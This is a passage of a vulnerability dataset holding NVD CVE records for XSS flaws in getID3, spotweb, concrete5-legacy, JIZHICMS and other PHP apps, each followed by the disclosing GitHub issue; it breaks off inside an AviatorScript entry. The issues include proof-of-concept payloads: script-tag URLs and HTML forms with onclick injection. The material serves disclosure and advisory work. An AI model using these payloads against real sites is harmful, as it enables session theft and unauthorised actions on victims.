Cross-site scripting (XSS) vulnerability in demos/demo.mysqli.php in getID3 1.X and v2.0.0-beta allows remote attackers to inject arbitrary web script or HTML via the showtagfiles parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/JamesHeinrich/getID3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JamesHeinrich/getID3/issues/341" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/JamesHeinrich/getID3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JamesHeinrich/getID3/issues/341" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:getid3:getid3:*:*:*:*:*:*:*:*", "matchCriteriaId": "8F10EAFB-3494-44F7-A7EE-090491DA8973", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:getid3:getid3:2.0.0:beta:*:*:*:*:*:*", "matchCriteriaId": "EDAB2B93-1824-42EE-815D-D802E8D3CD10", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/JamesHeinrich/getID3/issues/341
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "JamesHeinrich", "getID3" ]
**Describe the bug** Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. **To Reproduce** Steps to reproduce the behavior: 1. Access to the following link: http://[localhost]/getID3/demos/demo.mysqli.php?encoderoptionsdistribution=1&showtagfiles=%3Cscript%3Ealert(1)%3C/script%3E 2. Boom! **Where the Issue Occurred** The code below displays the user-controlled parameter `showtagfiles` without sufficient sanitization: https://github.com/JamesHeinrich/getID3/blob/4e02ed09c081a606c734c6b27d1b504fecfe402f/demos/demo.mysqli.php#L1500
[Security] XSS in demos/demo.mysqli.php of getID 3
https://api.github.com/repos/JamesHeinrich/getID3/issues/341/comments
1
2021-09-10T03:02:54Z
2021-09-10T12:00:20Z
https://github.com/JamesHeinrich/getID3/issues/341
992,841,914
341
2,647
CVE-2021-40927
2021-10-01T16:15:07.520
Cross-site scripting (XSS) vulnerability in callback.php in Spotify-for-Alfred 0.13.9 and below allows remote attackers to inject arbitrary web script or HTML via the error parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/citelao/Spotify-for-Alfred" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/citelao/Spotify-for-Alfred/issues/137" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/citelao/Spotify-for-Alfred" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/citelao/Spotify-for-Alfred/issues/137" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alfred-spotify-mini-player:alfred_spotify_mini_player:*:*:*:*:*:*:*:*", "matchCriteriaId": "57B59980-F176-475F-9097-08429EB33E9C", "versionEndExcluding": null, "versionEndIncluding": "0.13.9", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/citelao/Spotify-for-Alfred/issues/137
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "citelao", "Spotify-for-Alfred" ]
**Describe the bug** Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. **To Reproduce** Steps to reproduce the behavior: 1. Access to the following link: http://143.248.249.43/Spotify-for-Alfred/callback.php?error=%3Cscript%3Ealert(1)%3C/script%3E 2. Boom! **Where the Issue Occurred** The code below displays the user-controlled parameter `error` without sufficient sanitization: https://github.com/citelao/Spotify-for-Alfred/blob/941631eba0c581d38632a05d0e0101c438f1730d/callback.php#L50
[Security] XSS in callback.php
https://api.github.com/repos/citelao/Spotify-for-Alfred/issues/137/comments
1
2021-09-13T01:49:14Z
2022-01-17T23:29:43Z
https://github.com/citelao/Spotify-for-Alfred/issues/137
994,362,732
137
2,648
CVE-2021-40928
2021-10-01T16:15:07.567
Cross-site scripting (XSS) vulnerability in index.php in FlexTV beta development version allows remote attackers to inject arbitrary web script or HTML via the PHP_SELF parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/d8ahazard/FlexTV" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/d8ahazard/FlexTV/issues/37" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/d8ahazard/FlexTV" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/d8ahazard/FlexTV/issues/37" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:glimmrtv:flextv:-:beta:*:*:*:*:*:*", "matchCriteriaId": "CF5D115F-FD9D-4ED3-A195-B306B898E3C9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/d8ahazard/FlexTV/issues/37
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "d8ahazard", "FlexTV" ]
#### 1. Are you hosting your own version of Flex TV, or using the one at https://app.phlexchat.com? Yes #### 2. On what OS are you running Flex TV? Ubuntu #### 3. Are you using a new instance of XAMPP, or an existing webserver? Apache 2.4.29, Turn on the AcceptPathInfo in apache2.conf #### 3b. If not XAMPP, what WebServer stack are you using? No #### 4. Have you enabled the sockets module and ensured PHP has write-access to the directory containing Flex TV? Yes #### Description: Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. #### Steps To Reproduce: 1. Go to the page with the following link: http://[server]/FlexTV/index.php/');alert('1 2. Boom! **Where the Issue Occurred** The code below displays the user-controlled input `PHP_SELF` in `index.php` without sufficient sanitization: https://github.com/d8ahazard/FlexTV/blob/247d30d6c6737e517862710188b302d6a72a673c/index.php#L389 For Phlex: https://github.com/d8ahazard/Phlex/blob/0a87855726cbce49d0ca84c1a7432f7a3a0458e1/index.php#L237
[Security] XSS in index.php of Phlex and FlexTV
https://api.github.com/repos/d8ahazard/FlexTV/issues/37/comments
1
2021-09-13T02:14:03Z
2021-09-13T13:03:09Z
https://github.com/d8ahazard/FlexTV/issues/37
994,375,206
37
2,649
CVE-2021-40968
2021-10-01T16:15:07.610
Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword2 parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/spotweb/spotweb" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spotweb/spotweb/issues/711" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/spotweb/spotweb" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spotweb/spotweb/issues/711" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*", "matchCriteriaId": "ADCE8DCB-8A23-4529-9FC9-79194FF7A21A", "versionEndExcluding": null, "versionEndIncluding": "1.5.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/spotweb/spotweb/issues/711
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "spotweb", "spotweb" ]
**Describe the bug/issue** - Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. - Note that these multiple XSS vulnerabilities exist in the spotweb. **Have you searched the internet or Github for an answer?** - Not related **To Reproduce** Steps to reproduce the behavior: 1. Go to the installation page 2. Complete the configuration including DB connection => goto step 4 3. Access each page of these HTML files. #### Exploit 1 - exploit `username` parameter ```HTML <html> <form method="POST" action="http://[localhost]/spotweb/install.php?page=4"> <input name='settingsform[username]' value="1' onclick='alert(1)"> <button>Send my greetings</button> </form> </html> ``` #### Exploit 2 - exploit `newpassword1` parameter ```HTML <html> <form method="POST" action="http://[localhost]/spotweb/install.php?page=4"> <input name='settingsform[newpassword1]' value="1' onclick='alert(1)"> <button>Send my greetings</button> </form> </html> ``` #### Exploit 3 - exploit `newpassword2` parameter ```HTML <html> <form method="POST" action="http://[localhost]/spotweb/install.php?page=4"> <input name='settingsform[newpassword2]' value="1' onclick='alert(1)"> <button>Send my greetings</button> </form> </html> ``` #### Exploit 4 - exploit `firstname` parameter ```HTML <html> <form method="POST" action="http://[localhost]/spotweb/install.php?page=4"> <input name='settingsform[firstname]' value="1' onclick='alert(1)"> <button>Send my greetings</button> </form> </html> ``` #### Exploit 5 - exploit `lastname` parameter ```HTML <html> <form method="POST" action="http://[localhost]/spotweb/install.php?page=4"> <input name='settingsform[lastname]' value="1' onclick='alert(1)"> <button>Send my greetings</button> </form> </html> ``` #### Exploit 6 - exploit `mail` parameter ```HTML <html> <form method="POST" action="http://[localhost]/spotweb/install.php?page=4"> <input name='settingsform[mail]' value="1' onclick='alert(1)"> <button>Send my greetings</button> </form> </html> ``` 4. Click each text field 5. Boom! **Expected behavior** - This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. **Screenshots** <img width="994" alt="스크린샷 2021-09-12 오후 6 46 33" src="https://user-images.githubusercontent.com/26154873/132982963-45ae8aa4-f761-438f-a642-9c791e4022d7.png"> **Desktop (please complete the following information):** - (server) OS: ubuntu - (client) OS: window - Browser chrome - Spotweb Version 1.5.1 and below versions - Which branch Develop and Master - PHP version 7.1 **Additional context** The code below displays the user-controlled parameter `username`, `newpassword1`, `newpassword2`, `firstname`, `lastname` and `mail` with incorrect sanitization: https://github.com/spotweb/spotweb/blob/be2ab76cfa2efe28b426a1e1ce582eba0327c25b/templates/installer/step-004.inc.php#L41 https://github.com/spotweb/spotweb/blob/be2ab76cfa2efe28b426a1e1ce582eba0327c25b/templates/installer/step-004.inc.php#L46 https://github.com/spotweb/spotweb/blob/be2ab76cfa2efe28b426a1e1ce582eba0327c25b/templates/installer/step-004.inc.php#L51 https://github.com/spotweb/spotweb/blob/be2ab76cfa2efe28b426a1e1ce582eba0327c25b/templates/installer/step-004.inc.php#L56 https://github.com/spotweb/spotweb/blob/be2ab76cfa2efe28b426a1e1ce582eba0327c25b/templates/installer/step-004.inc.php#L61 https://github.com/spotweb/spotweb/blob/be2ab76cfa2efe28b426a1e1ce582eba0327c25b/templates/installer/step-004.inc.php#L66
[Security] six XSS in templates/installer/step-004.inc.php
https://api.github.com/repos/spotweb/spotweb/issues/711/comments
2
2021-09-12T09:52:25Z
2022-03-30T08:17:24Z
https://github.com/spotweb/spotweb/issues/711
994,114,353
711
2,650
CVE-2021-41461
2021-10-01T16:15:07.923
Cross-site scripting (XSS) vulnerability in concrete/elements/collection_add.php in concrete5-legacy 5.6.4.0 and below allows remote attackers to inject arbitrary web script or HTML via the mode parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/concrete5/concrete5-legacy" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/concrete5/concrete5-legacy/issues/2006" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/concrete5/concrete5-legacy" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/concrete5/concrete5-legacy/issues/2006" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:concrete5-legacy_project:concrete5-legacy:*:*:*:*:*:*:*:*", "matchCriteriaId": "EBD884A4-25DF-43E2-9A69-012653B8E48F", "versionEndExcluding": null, "versionEndIncluding": "5.6.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/concrete5/concrete5-legacy/issues/2006
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "concrete5", "concrete5-legacy" ]
Although this app is a legacy version, we found multiple XSS bugs so reporting them. **Describe the bug** Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. **To Reproduce** Steps to reproduce the behavior: 1. Go to the following links: - http://[server]/concrete5-legacy/web/index.php/tools/required/edit_collection_popup?cID=1&ctask=add&rel=&mode=&ctID=3%22%3E%3Cscript%3Ealert(1)%3C/script%3E - http://[server]/concrete5-legacy/web/index.php/tools/required/edit_collection_popup?cID=1&ctask=add&rel=3%22%3E%3Cscript%3Ealert(1)%3C/script%3E&mode=&ctID=1 - http://[server]/concrete5-legacy/web/index.php/tools/required/edit_collection[…]dd&rel=1&mode=3%22%3E%3Cscript%3Ealert(1)%3C/script%3E&ctID=1 - http://[server]/concrete5-legacy/web/index.php/tools/required/edit_collection_popup.php?cID=1&ctask=set_theme&rel=3%22%3E%3Cscript%3Ealert(1)%3C/script%3E - http://[server]/concrete5-legacy/web/index.php/tools/permissions/dialogs/access/entity/types/group_combination.php?cID=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E 2. Boom! **Screenshots** - Attack result ![캡처](https://user-images.githubusercontent.com/26154873/133558111-998c6248-49c3-4a1d-97c6-a6990b4e0459.PNG) **Where the Issue Occurred** The code below displays the user-controlled parameter `rel`, `ctID`, and `mode` in concrete/elements/collection_add.php, `rel` in concrete/elements/collection_theme.php, and `cID` in toos/permissions/dialogs/access/entity/types/group_combination.php without sufficient sanitization: https://github.com/concrete5/concrete5-legacy/blob/b5d89b7441ecd277f4516b84289de4e9324be47f/web/concrete/elements/collection_add.php#L15 https://github.com/concrete5/concrete5-legacy/blob/b5d89b7441ecd277f4516b84289de4e9324be47f/web/concrete/elements/collection_add.php#L16 https://github.com/concrete5/concrete5-legacy/blob/b5d89b7441ecd277f4516b84289de4e9324be47f/web/concrete/elements/collection_add.php#L17 https://github.com/concrete5/concrete5-legacy/blob/b5d89b7441ecd277f4516b84289de4e9324be47f/web/concrete/elements/collection_theme.php#L46 https://github.com/concrete5/concrete5-legacy/blob/b5d89b7441ecd277f4516b84289de4e9324be47f/web/concrete/tools/permissions/dialogs/access/entity/types/group_combination.php#L34
[Security] multiple XSS in concrete5-legacy
https://api.github.com/repos/concretecms/concrete5-legacy/issues/2006/comments
2
2021-09-16T06:01:54Z
2021-10-26T11:35:37Z
https://github.com/concretecms/concrete5-legacy/issues/2006
997,807,757
2,006
2,651
CVE-2021-41467
2021-10-01T16:15:08.140
Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hjue/JustWriting/" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hjue/JustWriting/issues/106" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/hjue/JustWriting/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hjue/JustWriting/issues/106" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "19D73A67-BB9F-47F0-8237-2C1E452DDE62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/hjue/JustWriting/issues/106
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hjue", "JustWriting" ]
**Describe the bug/issue** - Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. **To Reproduce** Steps to reproduce the behavior: 1. Go to the following link: http://[server]/sync/dropbox/download?challenge=%3Cscript%3Ealert(1)%3C/script%3E 2. Boom! **Where the vulnerability occurred?** The code below displays the user-controlled parameter `challenge` in application/controllers/dropbox.php with incorrect sanitization: https://github.com/hjue/JustWriting/blob/49731e03280e0474a1e862b73baabacb4ffccbfa/application/controllers/dropbox.php#L36
[Security] XSS in application/controllers/dropbox.php
https://api.github.com/repos/hjue/JustWriting/issues/106/comments
0
2021-09-17T06:50:17Z
2021-09-17T06:50:30Z
https://github.com/hjue/JustWriting/issues/106
999,006,976
106
2,652
CVE-2020-21228
2021-10-01T21:15:07.890
JIZHICMS 1.5.1 contains a cross-site scripting (XSS) vulnerability in the component /user/release.html, which allows attackers to arbitrarily add an administrator cookie.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://jizhicms.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Cherry-toto/jizhicms" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Cherry-toto/jizhicms/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://jizhicms.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Cherry-toto/jizhicms" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Cherry-toto/jizhicms/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jizhicms:jizhicms:1.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "DECD3616-2085-4ECC-9074-66DBD7029015", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Cherry-toto/jizhicms/issues/16
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Cherry-toto", "jizhicms" ]
JIZHICMS 1.5.1 allows XSS to add an administrator cookie. New normal account => New articles ![1584327644773](https://user-images.githubusercontent.com/56285852/76719830-f22b9b00-6775-11ea-9502-0cb2149d989e.jpg) code: ``` <script>alert(1)</script> ``` ![1584327682117](https://user-images.githubusercontent.com/56285852/76720030-97467380-6776-11ea-8a6e-b3bab76239d6.jpg) Go to administrator background ![1584327730818](https://user-images.githubusercontent.com/56285852/76719894-24d59380-6776-11ea-9621-93de6f25bf1f.jpg) Click on the title to trigger XSS ![1584327796413](https://user-images.githubusercontent.com/56285852/76719978-67976b80-6776-11ea-9dff-15dec827d284.jpg)
XSS Stealing cookies
https://api.github.com/repos/Cherry-toto/jizhicms/issues/16/comments
1
2020-03-16T03:08:27Z
2020-03-16T03:16:56Z
https://github.com/Cherry-toto/jizhicms/issues/16
581,964,252
16
2,653
CVE-2021-41862
2021-10-02T00:15:07.453
AviatorScript through 5.2.7 allows code execution via an expression that is encoded with Byte Code Engineering Library (BCEL).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" 